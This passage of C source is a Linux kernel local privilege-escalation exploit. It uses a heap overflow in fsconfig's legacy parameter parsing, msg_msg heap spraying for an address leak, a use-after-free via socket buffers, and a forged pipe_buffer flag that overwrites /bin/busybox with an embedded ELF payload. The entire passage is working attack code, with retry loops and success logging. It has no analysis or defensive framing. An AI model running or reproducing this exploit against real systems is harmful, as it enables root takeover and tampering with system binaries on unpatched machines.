msqid_1[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
if (msqid_1[i] < 0) {
logd("[-] msgget() fail\n");
die();
}
}
for (int i = 0; i < NUM_MSQIDS_2; i++) {
msqid_2[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
if (msqid_2[i] < 0) {
logd("[-] msgget() fail\n");
die();
}
}
}

void init_sock() {
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (sockfd < 0) {
logd("[-] socket() fail\n");
die();
}

for (int i = 0; i < NUM_SOCKETS; i++) {
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sock_pairs[i]) < 0) {
logd("[-] socketpair() fail\n");
die();
}
}
}

void clean_msq_1() {
for (int i = 0; i < NUM_MSQIDS_1; i++) {
msgrcv(msqid_1[i], &msg_a, sizeof(msg_a.mtext), MTYPE_A, IPC_NOWAIT);
}
}

void clean_msq_2() {
for (int i = 0; i < NUM_MSQIDS_2; i++) {
for (int j = 0; j < 0x10; j++) {
msgrcv(msqid_2[i], &msg_b, sizeof(msg_b.mtext), MTYPE_B | (j << 8), IPC_NOWAIT);
}
}
}

void clean_pipe() {
for (int i = 0; i < NUM_PIPES; i++) {
char buffer[0x100];
read(dummy_pipe[i][0], buffer, 0x100);
close(dummy_pipe[i][0]);
close(dummy_pipe[i][1]);
}
}

void bind_cpu() {
cpu_set_t my_set;
CPU_ZERO(&my_set);
CPU_SET(0, &my_set);
if (sched_setaffinity(0, sizeof(cpu_set_t), &my_set)) {
perror("sched_setaffinity");
die();
}
}

int call_fsopen() {
int fd = fsopen("ext4", 0);
if (fd < 0) {
perror("fsopen");
die();
}
return fd;
}

void spray_skbuff_data(void *ptr, size_t size) {
for (int i = 0; i < NUM_SOCKETS; i++) {
for (int j = 0; j < NUM_SKBUFFS; j++) {
if (write(sock_pairs[i][0], ptr, size) < 0) {
logd("[-] write to sock pairs failed\n");
die();
}
}
}
}

void free_skbuff_data(void *ptr, size_t size) {
for (int i = 0; i < NUM_SOCKETS; i++) {
for (int j = 0; j < NUM_SKBUFFS; j++) {
if (read(sock_pairs[i][1], ptr, size) < 0) {
logd("[-] read from sock pairs failed\n");
die();
}
}
}
}

uint64_t exploit_step1(int fd) {
char buff[0x1000];
logd("[*] prepare fsconfig heap overflow\n");
for (int i = 0; i < 0xff; i++) {
fsconfig(fd, FSCONFIG_SET_STRING, "aaaaaaa", "bbbbbbb", 0);
}
fsconfig(fd, FSCONFIG_SET_STRING, "cccccccc", "ddddd", 0);

// alloc msg_msg with 0x1000(-0x30) body and 0x400(-0x08) msg_msgseg
logd("[*] sparying msg_msg ...\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
memset(&msg_a, 0, sizeof(msg_a));
msg_a.mtype = MTYPE_A;
memset(msg_a.mtext, 'Q', sizeof(msg_a.mtext));
((int *)&msg_a.mtext)[0] = MSG_SIG;
((int *)&msg_a.mtext)[1] = i;
if (msgsnd(msqid_1[i], &msg_a, sizeof(msg_a.mtext), 0) < 0) {
logd("[-] msgsnd() fail\n");
die();
}
}

// trigger oob write to overwrite msg_msg.m_ts (hopes)
logd("[*] trigger oob write in `legacy_parse_param` to corrupt msg_msg.m_ts\n");
memset(buff, 0, sizeof(buff));
strcat(buff, "0000000"); // m_list.next
strcat(buff, "11111111"); // m_list.prev
strcat(buff, "22222222"); // m_type
uint64_t target_size = sizeof(msg_a_oob.mtext);
memcpy(buff + strlen(buff), &target_size, 2);

fsconfig(fd, FSCONFIG_SET_STRING, "\x00", buff, 0);

// recv from buffer to see if leak success
logd("[*] search corrupted msg_msg ...\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
ssize_t copy_size = msgrcv(msqid_1[i], &msg_a_oob, sizeof(msg_a_oob.mtext), 0, MSG_COPY | IPC_NOWAIT);

if (copy_size < 0) {
continue;
}
if (copy_size == sizeof(msg_a_oob.mtext)) {
logd("[+] corrupted msg_msg found, id: %d\n", msqid_1[i]);
list1_corrupted_msqid = msqid_1[i];
msqid_1[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
uint64_t *oob_data = (uint64_t *)(msg_a_oob.mtext + sizeof(msg_a.mtext));
size_t oob_size = sizeof(msg_a_oob.mtext) - sizeof(msg_a.mtext);
if (memcmp(&oob_data[1], "QQQQQQQQ", 8)) { // 'QQQQQQQQ'
logd("[!] but the next object is not allocated by msg_msgseg\n");
}
break;
}
}
if (list1_corrupted_msqid < 0) {
logd("[!] can't found corrupted msg_msg, and kernel may crash :(\n");
clean_msq_1();
return 1;
}

// clean uncorrupted msg_msg
logd("[*] clean unused msg_msg ...\n");
clean_msq_1();

// realloc 0x400 slab with msg_msg
logd("[*] alloc `struct msg_msg` to re-acquire the 0x400 slab freed by msg_msgseg ...\n");
for (int i = 0; i < NUM_MSQIDS_2; i++) {
memset(&msg_b, 0, sizeof(msg_b));
memset(msg_b.mtext, 'W', sizeof(msg_b.mtext));
((int *)&msg_b.mtext)[0] = MSG_SIG;
((int *)&msg_b.mtext)[1] = i;
for (int j = 0; j < 0x10; j++) {
msg_b.mtype = MTYPE_B | (j << 8);
if (msgsnd(msqid_2[i], &msg_b, sizeof(msg_b.mtext), 0) < 0) {
logd("[-] msgsnd() fail\n");
die();
}
}
}

// hope leak happen
{
ssize_t copy_size = msgrcv(list1_corrupted_msqid, &msg_a_oob, sizeof(msg_a_oob.mtext), 0, MSG_COPY | IPC_NOWAIT);
if ((copy_size < 0) || (copy_size != sizeof(msg_a_oob.mtext))) {
logd("[-] recv from corrupted msg_msg failed\n");
die();
}
uint64_t *oob_data = (uint64_t *)(msg_a_oob.mtext + sizeof(msg_a.mtext));
size_t oob_size = sizeof(msg_a_oob.mtext) - sizeof(msg_a.mtext);
struct msg_msg *p = (struct msg_msg *)oob_data;
if (((int *)&p->mtext)[0] != MSG_SIG) {
logd("[-] bad luck, we don't catch 0x400 msg_msg\n");
clean_msq_2();
return 1;
}
logd("[*] it works :)\n");

list2_leak_msqid = msqid_2[((int *)&p->mtext)[1]];
list2_leak_mtype = p->m_type;
list2_uaf_msg_addr = p->m_list.prev;
list2_uaf_mtype = p->m_type - 0x0100;
msqid_2[((int *)&p->mtext)[1]] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
hexdump(msg_a_oob.mtext + sizeof(msg_a.mtext), 0x40);
logd("[+] leak list2_leak_msqid: %d\n", list2_leak_msqid);
logd("[+] leak list2_leak_mtype: 0x%x\n", list2_leak_mtype);
logd("[+] leak list2_uaf_msg_addr: 0x%lx\n", list2_uaf_msg_addr);
logd("[+] leak list2_uaf_mtype: 0x%x\n", list2_uaf_mtype);
}

logd("[*] alloc msg_msg as heap buffer with known address\n");
{
for (int j = ((list2_leak_mtype + 0x100) >> 8); j < 0x10; j++) {
msgrcv(list2_leak_msqid, &msg_b, sizeof(msg_b.mtext), MTYPE_B | (j << 8), IPC_NOWAIT);
}
memset(buff, 0, sizeof(buff));
struct msg_msg *p = (struct msg_msg *)buff;
p->m_list.next = list2_uaf_msg_addr;
p->m_list.prev = 0xdeadbeefdeadbeef;
p->m_type = MTYPE_A;

memset(&msg_b, 0, sizeof(msg_b));
memcpy(msg_b.mtext, buff, sizeof(msg_b.mtext));
msg_b.mtype = MTYPE_B;
if (msgsnd(list2_leak_msqid, &msg_b, sizeof(msg_b.mtext), 0) < 0) {
logd("[-] msgsnd() fail\n");
die();
}
}

logd("[*] fetch heap_buffer address by oob read again\n");
{
ssize_t copy_size = msgrcv(list1_corrupted_msqid, &msg_a_oob, sizeof(msg_a_oob.mtext), 0, MSG_COPY | IPC_NOWAIT);
if ((copy_size < 0) || (copy_size != sizeof(msg_a_oob.mtext))) {
logd("[-] Recv from corrupted msg_msg failed\n");
die();
}
uint64_t *oob_data = (uint64_t *)(msg_a_oob.mtext + sizeof(msg_a.mtext));
size_t oob_size = sizeof(msg_a_oob.mtext) - sizeof(msg_a.mtext);
struct msg_msg *p = (struct msg_msg *)oob_data;
if (((int *)&p->mtext)[0] != MSG_SIG) {
logd("[-] I don't think this can happen\n");
die();
}
heap_buffer_addr = p->m_list.next + sizeof(struct msg_msg);
logd("[+] heap_buffer_addr: 0x%lx\n", heap_buffer_addr);
if (strlen((char *)&heap_buffer_addr) < 8) {
logd("[-] pointer can't contain 0x00 bytes\n");
die();
}
}

// clean uncorrupted msg_msg
logd("[*] clean unused msg_msg ...\n");
clean_msq_2();

return 0;
}

int exploit_step2(int fd) {
char buff[0x1000];

logd("[*] prepare fsconfig heap overflow\n");
for (int i = 0; i < 0xff; i++) {
fsconfig(fd, FSCONFIG_SET_STRING, "aaaaaaa", "bbbbbbb", 0);
}
fsconfig(fd, FSCONFIG_SET_STRING, "cccccccc", "ddddd", 0);

// alloc msg_msg with 0x1000(-0x30) body and 0x400(-0x08) msg_msgseg
logd("[*] sparying msg_msg ...\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
memset(&msg_a, 0, sizeof(msg_a));
msg_a.mtype = MTYPE_A;
memset(msg_a.mtext, 'Q', sizeof(msg_a.mtext));
((int *)&msg_a.mtext)[0] = MSG_SIG;
((int *)&msg_a.mtext)[1] = i;
if (msgsnd(msqid_1[i], &msg_a, sizeof(msg_a.mtext), 0) < 0) {
logd("[-] msgsnd() fail\n");
die();
}
}

// trigger oob write to overwrite msg_msg.next (hopes)
logd("[*] trigger oob write in `legacy_parse_param` to corrupt msg_msg.next\n");
memset(buff, 0, sizeof(buff));
struct msg_msg *p = (struct msg_msg *)buff;
p->m_list.next = heap_buffer_addr;
p->m_list.prev = 0xdeadbeefdeadbeef;
p->m_type = MTYPE_A; // with '=' appended
fsconfig(fd, FSCONFIG_SET_STRING, buff, "\x00", 0);

// free uaf msg_msg
logd("[*] free uaf msg_msg from correct msqid\n");
if (msgrcv(list2_leak_msqid, &msg_b, sizeof(msg_b.mtext), list2_uaf_mtype, 0) < 0) {
logd("[-] msgrcv() fail\n");
die();
}

// spary skbuff_data to re-acquire uaf msg_msg and fake the header
logd("[*] spray skbuff_data to re-acquire the 0x400 slab freed by msg_msg\n");
{
memset(buff, 0, sizeof(buff));
struct msg_msg *p = (struct msg_msg *)buff;
p->m_list.next = heap_buffer_addr + 0x80;
p->m_list.prev = heap_buffer_addr + 0x80;
p->m_ts = 0x100;
p->m_type = MTYPE_FAKE;
p->next = 0;
p->security = 0;
spray_skbuff_data(buff, 0x400 - 0x140);
}

// free uaf msg_msg
logd("[*] free skbuff_data using fake msqid\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
if (msgrcv(msqid_1[i], &msg_b, sizeof(msg_b.mtext), MTYPE_FAKE, IPC_NOWAIT) > 0) {
logd("[*] freed using msqid %d\n", i);
break;
}
}

// filled with pipe_buffer
logd("[*] spray pipe_buffer to re-acquire the 0x400 slab freed by skbuff_data\n");
int busybox = open("/bin/busybox", O_RDONLY);
if (busybox < 0) {
perror("open busybox");
die();
}
for (int i = 0; i < NUM_PIPES; i++) {
if (pipe(dummy_pipe[i])) {
logd("[-] Alloc pipe failed\n");
die();
}

const unsigned pipe_size = fcntl(dummy_pipe[i][1], F_GETPIPE_SZ);
static char tmp_buff[4096];

/* fill the pipe completely; each pipe_buffer will now have
the PIPE_BUF_FLAG_CAN_MERGE flag */
for (unsigned r = pipe_size; r > 0;) {
unsigned n = r > sizeof(tmp_buff) ? sizeof(tmp_buff) : r;
write(dummy_pipe[i][1], tmp_buff, n);
r -= n;
}

/* drain the pipe, freeing all pipe_buffer instances (but
leaving the flags initialized) */
for (unsigned r = pipe_size; r > 0;) {
unsigned n = r > sizeof(tmp_buff) ? sizeof(tmp_buff) : r;
read(dummy_pipe[i][0], tmp_buff, n);
r -= n;
}

write(dummy_pipe[i][1], buff, 0x100 + i);

loff_t offset = 1;
ssize_t nbytes = splice(busybox, &offset, dummy_pipe[i][1], NULL, 1, 0);
if (nbytes < 0) {
perror("splice failed");
die();
}
}

logd("[*] free skbuff_data to make pipe_buffer become UAF\n");
int uaf_pipe_idx = 0;
char pipe_buffer_backup[0x280];
int PIPE_BUF_FLAG_CAN_MERGE = 0x10;
{
void *ptr = buff;
uint64_t size = 0x400 - 0x140;
for (int i = 0; i < NUM_SOCKETS; i++) {
for (int j = 0; j < NUM_SKBUFFS; j++) {
if (read(sock_pairs[i][1], ptr, size) < 0) {
logd("[-] read from sock pairs failed\n");
die();
}
uint32_t test_size = ((uint32_t *)ptr)[3];
if ((test_size >= 0x100) && (test_size < 0x100 + NUM_PIPES)) {
uaf_pipe_idx = test_size - 0x100;
logd("[*] uaf_pipe_idx: %d\n", uaf_pipe_idx);
memcpy(pipe_buffer_backup, ptr, 0x280);
}
}
}
}

logd("[*] edit pipe_buffer->flags\n");
{
memset(buff, 0, sizeof(buff));
memcpy(buff, pipe_buffer_backup, 0x280);
((uint64_t *)buff)[6] = 0; // offset | len
((uint64_t *)buff)[8] = PIPE_BUF_FLAG_CAN_MERGE; // flag
spray_skbuff_data(buff, 0x400 - 0x140);
}

logd("[*] try to overwrite /bin/busybox\n");
{
ssize_t nbytes = write(dummy_pipe[uaf_pipe_idx][1], elfcode, sizeof(elfcode));
if (nbytes < 0) {
perror("write failed");
die();
}
if ((size_t)nbytes < 2) {
fprintf(stderr, "short write\n");
die();
}
}

logd("[+] exploit success\n");
return 0;
}

int main(void) {
int sync_pipe[2];
pipe(sync_pipe);

pid_t pid = fork();
if (!pid) {
logd("[+] perform initialization\n");
init_unshare();
bind_cpu();
init_msq();
init_sock();

int fd;

fd = call_fsopen();
logd("[+] perform exploit step1\n");
while (exploit_step1(fd)) {
logd("[!] retry step1 ...\n");

close(fd);
fd = call_fsopen();
}

fd = call_fsopen();
logd("[+] perform exploit step2\n");
while (exploit_step2(fd)) {
logd("[!] retry step2 ...\n");

close(fd);
fd = call_fsopen();
}

write(sync_pipe[1], "A", 1);
while (1) {
sleep(10);
}
} else {
char sync;
read(sync_pipe[0], &sync, 1);
}

return 0;
}